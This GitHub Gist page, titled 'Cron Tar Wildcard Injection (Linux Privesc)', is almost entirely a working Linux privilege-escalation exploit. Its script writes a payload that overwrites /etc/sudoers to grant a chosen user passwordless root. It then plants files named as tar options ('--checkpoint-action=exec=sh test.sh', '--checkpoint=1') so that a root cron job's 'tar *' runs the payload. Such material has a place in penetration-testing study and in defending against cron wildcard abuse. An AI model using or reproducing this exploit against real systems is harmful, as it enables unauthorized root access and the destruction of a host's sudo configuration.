Last active
October 10, 2022 10:09
-
-
Save CaptBoykin/0ef4466508e0241fe8722824f923b06d to your computer and use it in GitHub Desktop.
Cron Tar Wildcard Injection (Linux Privesc)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ | |
| // This will replace sudoers. Add your user to <INSERT YOUR USER HERE> | |
| echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh | |
| echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh | |
| echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh | |
| echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
| echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh | |
| echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh | |
| echo "" > "--checkpoint-action=exec=sh test.sh" | |
| echo "" > --checkpoint=1 | |
| tar cf archive.tar * |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Does
tar cf archive.tar *should return the following output?